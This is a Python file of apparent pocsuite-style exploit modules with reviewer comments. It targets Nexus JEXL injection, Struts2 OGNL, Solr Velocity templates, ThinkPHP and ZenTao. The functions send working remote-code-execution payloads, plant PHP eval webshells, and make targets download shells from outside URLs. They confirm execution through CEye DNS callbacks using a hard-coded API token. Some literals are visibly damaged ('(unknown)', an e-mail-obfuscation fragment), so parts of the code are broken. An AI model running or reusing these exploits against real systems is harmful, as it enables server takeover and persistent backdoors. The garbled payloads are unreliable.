        payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\ny,\\n 'Exploit.Test234',\\nz.getBytes('latin1'),0,\\n3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" % cmd2
        requests.post(target, data=payload, headers=self._headers)
        # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
        res = requests.get(
            'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
        )
        if cmd in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['Payload'] = payload
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _shell(self):
    """Make the zentao client download endpoint fetch a remote PHP file into
    ``/data/client/<random>/`` and then request it.

    Returns ``self.parse_output(result)`` — but ``result`` is never populated, so the
    outcome of ``shell_res`` is not reported; callers only see log output.
    """
    result = {}
    random_uri = random_str(16)
    try:
        # Remote file is pulled from a third-party URL the target will fetch.
        shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
        # The ``link`` parameter is expected base64-encoded.
        base64_payload = base64.b64encode(shell_payload.encode())
        shell_content = base64_payload.decode()
        shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
        # NOTE(review): print() bypasses the logger; use logger.info for consistency.
        print(shell_url)
        cookies = {
            "zentaosid": self.get_option("zentaosid")
        }
        down_res = requests.get(shell_url,cookies=cookies)
        shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
        logger.info("webshell地址:" + shell_info_url)
        # NOTE(review): the response is fetched but never checked, so success is unknown.
        shell_res = requests.get(shell_info_url,cookies=cookies)
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Check OGNL injection via the ``method:`` prefix with a `ping` to a unique
    subdomain and confirm execution through the CEye DNS log.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        # NOTE(review): the '[email protected]' fragment inside the literal looks like
        # extraction damage (e-mail obfuscation); the literal is kept as found.
        payload = "?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=" + cmd2 + "&pp=____A&ppp=%20&encoding=UTF-8"
        target = self.url + payload
        r = requests.get(target, headers=self._headers)
        if r.status_code == 200:
            # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
            res = requests.get(
                'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
            )
            if cmd in res:
                result['VerifyInfo'] = {}
                # Reports the base URL, not ``target``; the payload is recorded separately.
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _attack(self):
    """Write a PHP file fetched from ``shell_addr`` through the ``captcha`` request
    handler, then probe it with ``c=phpinfo();`` to confirm it runs.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    filename = random_str(6) + ".php"
    shell_addr = "http://pocsuite.org/include_files/php_attack.txt"
    # NOTE(review): "(unknown)" in both format strings reads like extraction residue
    # where a filename field once stood; the literals are kept as found, so the
    # ``filename=`` argument is currently unused by format().
    payload = "/index.php?s=captcha&Test=print_r(file_put_contents(%27(unknown)%27,file_get_contents(%27{url}%27)))".format(
        filename=filename, url=shell_addr)
    vul_url = self.url + payload
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27(unknown)%27,file_get_contents(%27{url}%27)))".format(
        filename=filename, url=shell_addr)
    # NOTE(review): no try/except here — a connection error propagates to the caller.
    requests.post(vul_url, data=data, headers=headers)
    r = requests.post(self.url + "/" + filename, data="c=phpinfo();", headers=headers)
    if r.status_code == 200 and "PHP Extension Build" in r.text:
        result['ShellInfo'] = {}
        result['ShellInfo']['URL'] = self.url + "/" + filename
        result['ShellInfo']['Content'] = shell_addr
    return self.parse_output(result)
def _verify(self):
    """Check expression injection through the ``username`` form field on ``/users``
    and confirm execution via the CEye DNS log.

    A 500 response is treated as the trigger signal before the log is consulted.
    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    try:
        target = self.url + '/users'
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd2
        r = requests.post(target, data=payload, headers=self._headers)
        if r.status_code == 500:
            # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
            res = requests.get(
                'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
            )
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Payload'] = payload
    except:
        # NOTE(review): bare except — all failures surface as "not vulnerable"; log them.
        pass
    return self.parse_output(result)
def _verify(self):
    """Check Solr Velocity template execution: enable the custom template on a core
    via ``self._update_config``, then render a template that runs a `ping` to a
    unique subdomain, confirmed via the CEye DNS log.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    p = 'ping '
    cmd = random_str(16) + '.6eb4yw.ceye.io'
    payload = p + cmd
    try:
        core_name = self._get_core_name(self.url)
        # NOTE(review): _update_config changes the core's configuration on the target —
        # a persistent side effect for a "verify" step.
        if self._update_config(self.url, core_name):
            url = self.url + "/solr/" + core_name + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + payload + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
            response = requests.get(url=url)
            logger.info(response.text)
            # NOTE(review): hard-coded CEye API token — credential in source, shared DNS log.
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)
def _attack(self):
    """Drop a PHP webshell via the method/vars request found by ``self._check``
    (posted, then re-sent as a GET query string) and report the shell URL.

    Returns ``self.parse_output`` of the evidence dict.
    """
    result = {}
    filename = random_str(6) + ".php"
    webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''
    # _check is expected to return (path, data-dict) or a falsy value — TODO confirm.
    p = self._check(self.url)
    if p:
        data = p[1]
        # NOTE(review): "(unknown)" reads like extraction residue where a filename field
        # once stood; the literal is kept as found, so ``filename=`` is currently unused.
        data[
            "vars[1][]"] = "echo%20%27{content}%27%20>%20(unknown)".format(
            filename=filename, content=quote(webshell))
        data["vars[0]"] = "system"
        vulurl = self.url + p[0]
        post_r = requests.post(vulurl, data=data)
        # Same parameters replayed as a GET; KeyError if _check's dict lacks "function".
        data_function_value = data["function"]
        data_vars0_value = data["vars[0]"]
        data_vars1_value = data["vars[1][]"]
        get_string = "&" + "function" + "=" + data_function_value + "&" + "vars[0]" + "=" + data_vars0_value + "&" + "vars[1][]" + "=" + data_vars1_value
        r = requests.get(vulurl + get_string)
        r1 = requests.get(self.url + "/" + filename)
        if r1.status_code == 200 and "green day" in r1.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/" + filename
            result['ShellInfo']['Content'] = webshell
    # NOTE(review): the indentation of this fallback is not recoverable from the collapsed
    # source; it is placed at function level to mirror the sibling _attack. At that level
    # it dereferences p[1] even when p is falsy, which would raise — confirm placement.
    if not result:
        #vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile=(unknown)&content={content}"
        #vulurl = vulurl.format(filename=filename, content=quote(webshell))
        data = p[1]
        data[
            "vars[1][]"] = "echo%20%27{content}%27%20>%20(unknown)".format(
            filename=filename, content=quote(webshell))
        data["vars[0]"] = "system"
        vulurl = self.url + p[0]
        #requests.get(vulurl)
        # Only re-fetches the file; nothing new is sent in this branch.
        r = requests.get(self.url + "/" + filename)
        #r = requests.get(vulurl + "&" + data)
        if r.status_code == 200 and "green day" in r.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/" + filename
            result['ShellInfo']['Content'] = webshell
    return self.parse_output(result)
def build_request(self, value):
    """Build the out-of-band callback URL that embeds *value*.

    :param value: the message to place in the request path
    :return: dict with ``url`` (callback URL on the CEye subdomain, with a random
             4-character marker as host label and wrapped around *value*) and
             ``flag`` (that marker). Both are empty strings when
             ``check_account()`` fails.

    Example:
        {
            'url': 'http://htCb.jwm77k.ceye.io/htCbpingaaahtCb',
            'flag': 'htCb'
        }
    """
    if not self.check_account():
        return {"url": "", "flag": ""}
    marker = random_str(4)
    callback_url = "http://{marker}.{domain}/{marker}{value}{marker}".format(
        marker=marker, domain=self.getsubdomain(), value=value)
    return {"url": callback_url, "flag": marker}